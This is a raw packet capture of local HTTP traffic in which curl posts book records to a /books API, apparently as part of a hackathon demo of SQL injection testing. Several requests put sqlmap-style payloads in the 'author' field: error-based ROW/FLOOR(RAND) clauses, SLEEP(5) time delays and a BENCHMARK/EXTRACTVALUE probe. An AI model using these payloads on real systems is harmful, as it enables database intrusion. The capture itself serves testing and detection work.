21:11:02.771109 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.54112 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0x1211), seq 1495829863, win 43690, options [mss 65476,sackOK,TS val 5683035 ecr 0,nop,wscale 7], length 0
21:11:02.771143 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.54112: Flags [S.], cksum 0x0030 (incorrect -> 0x1ab7), seq 4262216074, ack 1495829864, win 43690, options [mss 65476,sackOK,TS val 5683035 ecr 5683035,nop,wscale 7], length 0
21:11:02.771165 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54112 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xece8), seq 1, ack 1, win 342, options [nop,nop,TS val 5683035 ecr 5683035], length 0
21:11:02.771255 IP6 (hlim 64, next-header TCP (6) payload length: 428) ::1.54112 > ::1.8080: Flags [P.], cksum 0x01b4 (incorrect -> 0x0b67), seq 1:397, ack 1, win 342, options [nop,nop,TS val 5683035 ecr 5683035], length 396: HTTP, length: 396
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 260
	
	{"name":"Hackathon-Demo0","author":"RameshAND ROW(4115,7844)>(SELECT COUNT(*),CONCAT(0x717a786271,(SELECT (ELT(4115=4115,1))),0x7176767871,FLOOR(RAND(0)*2))x FROM (SELECT 9757 UNION SELECT 8982 UNION SELECT 5308 UNION SELECT 5233)a GROUP BY x)","price":"9.99"}[!http]
21:11:02.771268 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.54112: Flags [.], cksum 0x0028 (incorrect -> 0xeb54), seq 1, ack 397, win 350, options [nop,nop,TS val 5683035 ecr 5683035], length 0
21:11:02.775516 IP6 (hlim 64, next-header TCP (6) payload length: 434) ::1.8080 > ::1.54112: Flags [P.], cksum 0x01ba (incorrect -> 0x9fd8), seq 1:403, ack 397, win 350, options [nop,nop,TS val 5683039 ecr 5683035], length 402: HTTP, length: 402
	HTTP/1.1 201 
	Content-Type: application/json;charset=UTF-8
	Transfer-Encoding: chunked
	Date: Thu, 27 Jun 2019 21:11:02 GMT
	
	10b
	{"id":309,"name":"Hackathon-Demo0","author":"RameshAND ROW(4115,7844)>(SELECT COUNT(*),CONCAT(0x717a786271,(SELECT (ELT(4115=4115,1))),0x7176767871,FLOOR(RAND(0)*2))x FROM (SELECT 9757 UNION SELECT 8982 UNION SELECT 5308 UNION SELECT 5233)a GROUP BY x)","price":9.99}
21:11:02.775531 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54112 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xe9ba), seq 397, ack 403, win 350, options [nop,nop,TS val 5683039 ecr 5683039], length 0
21:11:02.775872 IP6 (hlim 64, next-header TCP (6) payload length: 37) ::1.8080 > ::1.54112: Flags [P.], cksum 0x002d (incorrect -> 0xa593), seq 403:408, ack 397, win 350, options [nop,nop,TS val 5683039 ecr 5683039], length 5: HTTP
21:11:02.775888 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54112 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xe9b4), seq 397, ack 408, win 350, options [nop,nop,TS val 5683040 ecr 5683039], length 0
21:11:02.776013 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54112 > ::1.8080: Flags [F.], cksum 0x0028 (incorrect -> 0xe9b3), seq 397, ack 408, win 350, options [nop,nop,TS val 5683040 ecr 5683039], length 0
21:11:02.777913 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.54112: Flags [F.], cksum 0x0028 (incorrect -> 0xe9af), seq 408, ack 398, win 350, options [nop,nop,TS val 5683042 ecr 5683040], length 0
21:11:02.777932 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54112 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xe9ad), seq 398, ack 409, win 350, options [nop,nop,TS val 5683042 ecr 5683042], length 0
21:11:02.786451 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.54114 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0xce87), seq 206446010, win 43690, options [mss 65476,sackOK,TS val 5683050 ecr 0,nop,wscale 7], length 0
21:11:02.786484 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.54114: Flags [S.], cksum 0x0030 (incorrect -> 0xac19), seq 21064027, ack 206446011, win 43690, options [mss 65476,sackOK,TS val 5683050 ecr 5683050,nop,wscale 7], length 0
21:11:02.786505 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54114 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x7e4b), seq 1, ack 1, win 342, options [nop,nop,TS val 5683050 ecr 5683050], length 0
21:11:02.786598 IP6 (hlim 64, next-header TCP (6) payload length: 228) ::1.54114 > ::1.8080: Flags [P.], cksum 0x00ec (incorrect -> 0x81f8), seq 1:197, ack 1, win 342, options [nop,nop,TS val 5683050 ecr 5683050], length 196: HTTP, length: 196
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 61
	
	{"name":"Hackathon-Demo1","author":"Ramesh-P","price":"9.99"}[!http]
21:11:02.786612 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.54114: Flags [.], cksum 0x0028 (incorrect -> 0x7d7f), seq 1, ack 197, win 350, options [nop,nop,TS val 5683050 ecr 5683050], length 0
21:11:02.789734 IP6 (hlim 64, next-header TCP (6) payload length: 234) ::1.8080 > ::1.54114: Flags [P.], cksum 0x00f2 (incorrect -> 0xa0db), seq 1:203, ack 197, win 350, options [nop,nop,TS val 5683053 ecr 5683050], length 202: HTTP, length: 202
	HTTP/1.1 201 
	Content-Type: application/json;charset=UTF-8
	Transfer-Encoding: chunked
	Date: Thu, 27 Jun 2019 21:11:02 GMT
	
	44
	{"id":310,"name":"Hackathon-Demo1","author":"Ramesh-P","price":9.99}
21:11:02.789752 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54114 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x7caf), seq 197, ack 203, win 350, options [nop,nop,TS val 5683053 ecr 5683053], length 0
21:11:02.790035 IP6 (hlim 64, next-header TCP (6) payload length: 37) ::1.8080 > ::1.54114: Flags [P.], cksum 0x002d (incorrect -> 0x3887), seq 203:208, ack 197, win 350, options [nop,nop,TS val 5683054 ecr 5683053], length 5: HTTP
21:11:02.790051 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54114 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x7ca8), seq 197, ack 208, win 350, options [nop,nop,TS val 5683054 ecr 5683054], length 0
21:11:02.790235 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54114 > ::1.8080: Flags [F.], cksum 0x0028 (incorrect -> 0x7ca7), seq 197, ack 208, win 350, options [nop,nop,TS val 5683054 ecr 5683054], length 0
21:11:02.790453 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.54114: Flags [F.], cksum 0x0028 (incorrect -> 0x7ca6), seq 208, ack 198, win 350, options [nop,nop,TS val 5683054 ecr 5683054], length 0
21:11:02.790496 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54114 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x7ca6), seq 198, ack 209, win 350, options [nop,nop,TS val 5683054 ecr 5683054], length 0
21:11:02.799267 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.54116 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0x2061), seq 899129992, win 43690, options [mss 65476,sackOK,TS val 5683063 ecr 0,nop,wscale 7], length 0
21:11:02.799292 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.54116: Flags [S.], cksum 0x0030 (incorrect -> 0x01ed), seq 50881421, ack 899129993, win 43690, options [mss 65476,sackOK,TS val 5683063 ecr 5683063,nop,wscale 7], length 0
21:11:02.799312 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54116 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xd41e), seq 1, ack 1, win 342, options [nop,nop,TS val 5683063 ecr 5683063], length 0
21:11:02.799397 IP6 (hlim 64, next-header TCP (6) payload length: 239) ::1.54116 > ::1.8080: Flags [P.], cksum 0x00f7 (incorrect -> 0x7984), seq 1:208, ack 1, win 342, options [nop,nop,TS val 5683063 ecr 5683063], length 207: HTTP, length: 207
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 72
	
	{"name":"Hackathon-Demo2","author":"Ramesh AND SLEEP(5)","price":"9.99"}[!http]
21:11:02.799410 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.54116: Flags [.], cksum 0x0028 (incorrect -> 0xd347), seq 1, ack 208, win 350, options [nop,nop,TS val 5683063 ecr 5683063], length 0
21:11:02.801628 IP6 (hlim 64, next-header TCP (6) payload length: 245) ::1.8080 > ::1.54116: Flags [P.], cksum 0x00fd (incorrect -> 0x853f), seq 1:214, ack 208, win 350, options [nop,nop,TS val 5683065 ecr 5683063], length 213: HTTP, length: 213
	HTTP/1.1 201 
	Content-Type: application/json;charset=UTF-8
	Transfer-Encoding: chunked
	Date: Thu, 27 Jun 2019 21:11:02 GMT
	
	4f
	{"id":311,"name":"Hackathon-Demo2","author":"Ramesh AND SLEEP(5)","price":9.99}
21:11:02.801648 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54116 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xd26e), seq 208, ack 214, win 350, options [nop,nop,TS val 5683065 ecr 5683065], length 0
21:11:02.801982 IP6 (hlim 64, next-header TCP (6) payload length: 37) ::1.8080 > ::1.54116: Flags [P.], cksum 0x002d (incorrect -> 0x8e46), seq 214:219, ack 208, win 350, options [nop,nop,TS val 5683066 ecr 5683065], length 5: HTTP
21:11:02.802016 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54116 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xd267), seq 208, ack 219, win 350, options [nop,nop,TS val 5683066 ecr 5683066], length 0
21:11:02.802117 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54116 > ::1.8080: Flags [F.], cksum 0x0028 (incorrect -> 0xd266), seq 208, ack 219, win 350, options [nop,nop,TS val 5683066 ecr 5683066], length 0
21:11:02.802230 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.54116: Flags [F.], cksum 0x0028 (incorrect -> 0xd265), seq 219, ack 209, win 350, options [nop,nop,TS val 5683066 ecr 5683066], length 0
21:11:02.802276 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54116 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xd265), seq 209, ack 220, win 350, options [nop,nop,TS val 5683066 ecr 5683066], length 0
21:11:02.812173 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.54118 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0x73bc), seq 2130838963, win 43690, options [mss 65476,sackOK,TS val 5683076 ecr 0,nop,wscale 7], length 0
21:11:02.812193 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.54118: Flags [S.], cksum 0x0030 (incorrect -> 0x21f1), seq 2009539096, ack 2130838964, win 43690, options [mss 65476,sackOK,TS val 5683076 ecr 5683076,nop,wscale 7], length 0
21:11:02.812207 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54118 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xf422), seq 1, ack 1, win 342, options [nop,nop,TS val 5683076 ecr 5683076], length 0
21:11:02.812301 IP6 (hlim 64, next-header TCP (6) payload length: 228) ::1.54118 > ::1.8080: Flags [P.], cksum 0x00ec (incorrect -> 0xf5cf), seq 1:197, ack 1, win 342, options [nop,nop,TS val 5683076 ecr 5683076], length 196: HTTP, length: 196
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 61
	
	{"name":"Hackathon-Demo3","author":"Ramesh-P","price":"9.99"}[!http]
21:11:02.812316 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.54118: Flags [.], cksum 0x0028 (incorrect -> 0xf356), seq 1, ack 197, win 350, options [nop,nop,TS val 5683076 ecr 5683076], length 0
21:11:02.814549 IP6 (hlim 64, next-header TCP (6) payload length: 234) ::1.8080 > ::1.54118: Flags [P.], cksum 0x00f2 (incorrect -> 0x12b4), seq 1:203, ack 197, win 350, options [nop,nop,TS val 5683078 ecr 5683076], length 202: HTTP, length: 202
	HTTP/1.1 201 
	Content-Type: application/json;charset=UTF-8
	Transfer-Encoding: chunked
	Date: Thu, 27 Jun 2019 21:11:02 GMT
	
	44
	{"id":312,"name":"Hackathon-Demo3","author":"Ramesh-P","price":9.99}
21:11:02.814562 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54118 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xf288), seq 197, ack 203, win 350, options [nop,nop,TS val 5683078 ecr 5683078], length 0
21:11:02.814801 IP6 (hlim 64, next-header TCP (6) payload length: 37) ::1.8080 > ::1.54118: Flags [P.], cksum 0x002d (incorrect -> 0xae61), seq 203:208, ack 197, win 350, options [nop,nop,TS val 5683078 ecr 5683078], length 5: HTTP
21:11:02.814812 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54118 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xf282), seq 197, ack 208, win 350, options [nop,nop,TS val 5683079 ecr 5683078], length 0
21:11:02.814918 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54118 > ::1.8080: Flags [F.], cksum 0x0028 (incorrect -> 0xf281), seq 197, ack 208, win 350, options [nop,nop,TS val 5683079 ecr 5683078], length 0
21:11:02.815127 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.54118: Flags [F.], cksum 0x0028 (incorrect -> 0xf27f), seq 208, ack 198, win 350, options [nop,nop,TS val 5683079 ecr 5683079], length 0
21:11:02.815173 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54118 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xf27f), seq 198, ack 209, win 350, options [nop,nop,TS val 5683079 ecr 5683079], length 0
21:11:02.823551 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.54120 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0x33d5), seq 3979597659, win 43690, options [mss 65476,sackOK,TS val 5683087 ecr 0,nop,wscale 7], length 0
21:11:02.823573 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.54120: Flags [S.], cksum 0x0030 (incorrect -> 0x12cb), seq 641680084, ack 3979597660, win 43690, options [mss 65476,sackOK,TS val 5683087 ecr 5683087,nop,wscale 7], length 0
21:11:02.823591 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54120 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xe4fc), seq 1, ack 1, win 342, options [nop,nop,TS val 5683087 ecr 5683087], length 0
21:11:02.823676 IP6 (hlim 64, next-header TCP (6) payload length: 240) ::1.54120 > ::1.8080: Flags [P.], cksum 0x00f8 (incorrect -> 0x6d58), seq 1:209, ack 1, win 342, options [nop,nop,TS val 5683087 ecr 5683087], length 208: HTTP, length: 208
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 73
	
	{"name":"Hackathon-Demo4","author":"Ramesh AND SLEEP(5)#","price":"9.99"}[!http]
21:11:02.823690 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.54120: Flags [.], cksum 0x0028 (incorrect -> 0xe424), seq 1, ack 209, win 350, options [nop,nop,TS val 5683087 ecr 5683087], length 0
21:11:02.826033 IP6 (hlim 64, next-header TCP (6) payload length: 246) ::1.8080 > ::1.54120: Flags [P.], cksum 0x00fe (incorrect -> 0x8a34), seq 1:215, ack 209, win 350, options [nop,nop,TS val 5683090 ecr 5683087], length 214: HTTP, length: 214
	HTTP/1.1 201 
	Content-Type: application/json;charset=UTF-8
	Transfer-Encoding: chunked
	Date: Thu, 27 Jun 2019 21:11:02 GMT
	
	50
	{"id":313,"name":"Hackathon-Demo4","author":"Ramesh AND SLEEP(5)#","price":9.99}
21:11:02.826050 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54120 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xe348), seq 209, ack 215, win 350, options [nop,nop,TS val 5683090 ecr 5683090], length 0
21:11:02.826300 IP6 (hlim 64, next-header TCP (6) payload length: 37) ::1.8080 > ::1.54120: Flags [P.], cksum 0x002d (incorrect -> 0x9f21), seq 215:220, ack 209, win 350, options [nop,nop,TS val 5683090 ecr 5683090], length 5: HTTP
21:11:02.826316 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54120 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xe343), seq 209, ack 220, win 350, options [nop,nop,TS val 5683090 ecr 5683090], length 0
21:11:02.826490 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54120 > ::1.8080: Flags [F.], cksum 0x0028 (incorrect -> 0xe342), seq 209, ack 220, win 350, options [nop,nop,TS val 5683090 ecr 5683090], length 0
21:11:02.826642 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.54120: Flags [F.], cksum 0x0028 (incorrect -> 0xe341), seq 220, ack 210, win 350, options [nop,nop,TS val 5683090 ecr 5683090], length 0
21:11:02.826659 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54120 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xe341), seq 210, ack 221, win 350, options [nop,nop,TS val 5683090 ecr 5683090], length 0
21:11:02.835329 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.54122 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0x4472), seq 3802059077, win 43690, options [mss 65476,sackOK,TS val 5683099 ecr 0,nop,wscale 7], length 0
21:11:02.835356 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.54122: Flags [S.], cksum 0x0030 (incorrect -> 0x046a), seq 1608722466, ack 3802059078, win 43690, options [mss 65476,sackOK,TS val 5683099 ecr 5683099,nop,wscale 7], length 0
21:11:02.835374 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54122 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xd69b), seq 1, ack 1, win 342, options [nop,nop,TS val 5683099 ecr 5683099], length 0
21:11:02.835463 IP6 (hlim 64, next-header TCP (6) payload length: 228) ::1.54122 > ::1.8080: Flags [P.], cksum 0x00ec (incorrect -> 0xd648), seq 1:197, ack 1, win 342, options [nop,nop,TS val 5683099 ecr 5683099], length 196: HTTP, length: 196
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 61
	
	{"name":"Hackathon-Demo5","author":"Ramesh-P","price":"9.99"}[!http]
21:11:02.835477 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.54122: Flags [.], cksum 0x0028 (incorrect -> 0xd5cf), seq 1, ack 197, win 350, options [nop,nop,TS val 5683099 ecr 5683099], length 0
21:11:02.837451 IP6 (hlim 64, next-header TCP (6) payload length: 234) ::1.8080 > ::1.54122: Flags [P.], cksum 0x00f2 (incorrect -> 0xf12c), seq 1:203, ack 197, win 350, options [nop,nop,TS val 5683101 ecr 5683099], length 202: HTTP, length: 202
	HTTP/1.1 201 
	Content-Type: application/json;charset=UTF-8
	Transfer-Encoding: chunked
	Date: Thu, 27 Jun 2019 21:11:02 GMT
	
	44
	{"id":314,"name":"Hackathon-Demo5","author":"Ramesh-P","price":9.99}
21:11:02.837468 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54122 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xd501), seq 197, ack 203, win 350, options [nop,nop,TS val 5683101 ecr 5683101], length 0
21:11:02.837711 IP6 (hlim 64, next-header TCP (6) payload length: 37) ::1.8080 > ::1.54122: Flags [P.], cksum 0x002d (incorrect -> 0x90da), seq 203:208, ack 197, win 350, options [nop,nop,TS val 5683101 ecr 5683101], length 5: HTTP
21:11:02.837726 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54122 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xd4fc), seq 197, ack 208, win 350, options [nop,nop,TS val 5683101 ecr 5683101], length 0
21:11:02.837907 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54122 > ::1.8080: Flags [F.], cksum 0x0028 (incorrect -> 0xd4fa), seq 197, ack 208, win 350, options [nop,nop,TS val 5683102 ecr 5683101], length 0
21:11:02.838060 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.54122: Flags [F.], cksum 0x0028 (incorrect -> 0xd4f8), seq 208, ack 198, win 350, options [nop,nop,TS val 5683102 ecr 5683102], length 0
21:11:02.838078 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54122 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xd4f8), seq 198, ack 209, win 350, options [nop,nop,TS val 5683102 ecr 5683102], length 0
21:11:02.854932 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.54124 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0x645b), seq 547058506, win 43690, options [mss 65476,sackOK,TS val 5683119 ecr 0,nop,wscale 7], length 0
21:11:02.854956 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.54124: Flags [S.], cksum 0x0030 (incorrect -> 0x7988), seq 3691730608, ack 547058507, win 43690, options [mss 65476,sackOK,TS val 5683119 ecr 5683119,nop,wscale 7], length 0
21:11:02.854971 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54124 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x4bba), seq 1, ack 1, win 342, options [nop,nop,TS val 5683119 ecr 5683119], length 0
21:11:02.855054 IP6 (hlim 64, next-header TCP (6) payload length: 317) ::1.54124 > ::1.8080: Flags [P.], cksum 0x0145 (incorrect -> 0x42d5), seq 1:286, ack 1, win 342, options [nop,nop,TS val 5683119 ecr 5683119], length 285: HTTP, length: 285
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 149
	
	{"name":"Hackathon-Demo6","author":"Ramesh PROCEDURE ANALYSE(EXTRACTVALUE(3695,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x50477a4b))))),1)","price":"9.99"}[!http]
21:11:02.855065 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.54124: Flags [.], cksum 0x0028 (incorrect -> 0x4a95), seq 1, ack 286, win 350, options [nop,nop,TS val 5683119 ecr 5683119], length 0
21:11:02.858723 IP6 (hlim 64, next-header TCP (6) payload length: 322) ::1.8080 > ::1.54124: Flags [P.], cksum 0x014a (incorrect -> 0xf1cd), seq 1:291, ack 286, win 350, options [nop,nop,TS val 5683122 ecr 5683119], length 290: HTTP, length: 290
	HTTP/1.1 201 
	Content-Type: application/json;charset=UTF-8
	Transfer-Encoding: chunked
	Date: Thu, 27 Jun 2019 21:11:02 GMT
	
	9c
	{"id":315,"name":"Hackathon-Demo6","author":"Ramesh PROCEDURE ANALYSE(EXTRACTVALUE(3695,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x50477a4b))))),1)","price":9.99}
21:11:02.858744 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54124 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x496d), seq 286, ack 291, win 350, options [nop,nop,TS val 5683122 ecr 5683122], length 0
21:11:02.859066 IP6 (hlim 64, next-header TCP (6) payload length: 37) ::1.8080 > ::1.54124: Flags [P.], cksum 0x002d (incorrect -> 0x0545), seq 291:296, ack 286, win 350, options [nop,nop,TS val 5683123 ecr 5683122], length 5: HTTP
21:11:02.859096 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54124 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x4966), seq 286, ack 296, win 350, options [nop,nop,TS val 5683123 ecr 5683123], length 0
21:11:02.859459 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54124 > ::1.8080: Flags [F.], cksum 0x0028 (incorrect -> 0x4965), seq 286, ack 296, win 350, options [nop,nop,TS val 5683123 ecr 5683123], length 0
21:11:02.860388 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.54124: Flags [F.], cksum 0x0028 (incorrect -> 0x4963), seq 296, ack 287, win 350, options [nop,nop,TS val 5683124 ecr 5683123], length 0
21:11:02.860405 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54124 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x4962), seq 287, ack 297, win 350, options [nop,nop,TS val 5683124 ecr 5683124], length 0
21:11:02.869573 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.54126 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0x08dd), seq 821476957, win 43690, options [mss 65476,sackOK,TS val 5683133 ecr 0,nop,wscale 7], length 0
21:11:02.869604 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.54126: Flags [S.], cksum 0x0030 (incorrect -> 0x4bc6), seq 2361292851, ack 821476958, win 43690, options [mss 65476,sackOK,TS val 5683133 ecr 5683133,nop,wscale 7], length 0
21:11:02.869626 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54126 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x1df8), seq 1, ack 1, win 342, options [nop,nop,TS val 5683133 ecr 5683133], length 0
21:11:02.869727 IP6 (hlim 64, next-header TCP (6) payload length: 228) ::1.54126 > ::1.8080: Flags [P.], cksum 0x00ec (incorrect -> 0x1ba5), seq 1:197, ack 1, win 342, options [nop,nop,TS val 5683133 ecr 5683133], length 196: HTTP, length: 196
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 61
	
	{"name":"Hackathon-Demo7","author":"Ramesh-P","price":"9.99"}[!http]
21:11:02.869741 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.54126: Flags [.], cksum 0x0028 (incorrect -> 0x1d2c), seq 1, ack 197, win 350, options [nop,nop,TS val 5683133 ecr 5683133], length 0
21:11:02.873091 IP6 (hlim 64, next-header TCP (6) payload length: 234) ::1.8080 > ::1.54126: Flags [P.], cksum 0x00f2 (incorrect -> 0x3487), seq 1:203, ack 197, win 350, options [nop,nop,TS val 5683137 ecr 5683133], length 202: HTTP, length: 202
	HTTP/1.1 201 
	Content-Type: application/json;charset=UTF-8
	Transfer-Encoding: chunked
	Date: Thu, 27 Jun 2019 21:11:02 GMT
	
	44
	{"id":316,"name":"Hackathon-Demo7","author":"Ramesh-P","price":9.99}
21:11:02.873106 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54126 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x1c5a), seq 197, ack 203, win 350, options [nop,nop,TS val 5683137 ecr 5683137], length 0
21:11:02.873471 IP6 (hlim 64, next-header TCP (6) payload length: 37) ::1.8080 > ::1.54126: Flags [P.], cksum 0x002d (incorrect -> 0xd832), seq 203:208, ack 197, win 350, options [nop,nop,TS val 5683137 ecr 5683137], length 5: HTTP
21:11:02.873487 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54126 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x1c55), seq 197, ack 208, win 350, options [nop,nop,TS val 5683137 ecr 5683137], length 0
21:11:02.873785 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54126 > ::1.8080: Flags [F.], cksum 0x0028 (incorrect -> 0x1c54), seq 197, ack 208, win 350, options [nop,nop,TS val 5683137 ecr 5683137], length 0
21:11:02.874642 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.54126: Flags [F.], cksum 0x0028 (incorrect -> 0x1c52), seq 208, ack 198, win 350, options [nop,nop,TS val 5683138 ecr 5683137], length 0
21:11:02.874658 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54126 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x1c51), seq 198, ack 209, win 350, options [nop,nop,TS val 5683138 ecr 5683138], length 0
21:11:02.884446 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.54128 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0x91ed), seq 1583220692, win 43690, options [mss 65476,sackOK,TS val 5683148 ecr 0,nop,wscale 7], length 0
21:11:02.884467 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.54128: Flags [S.], cksum 0x0030 (incorrect -> 0x1281), seq 1581213945, ack 1583220693, win 43690, options [mss 65476,sackOK,TS val 5683148 ecr 5683148,nop,wscale 7], length 0
21:11:02.884484 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.54128 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xe4b2), seq 1, ack 1, win 342, options [nop,nop,TS val 5683148 ecr 5683148], length 0
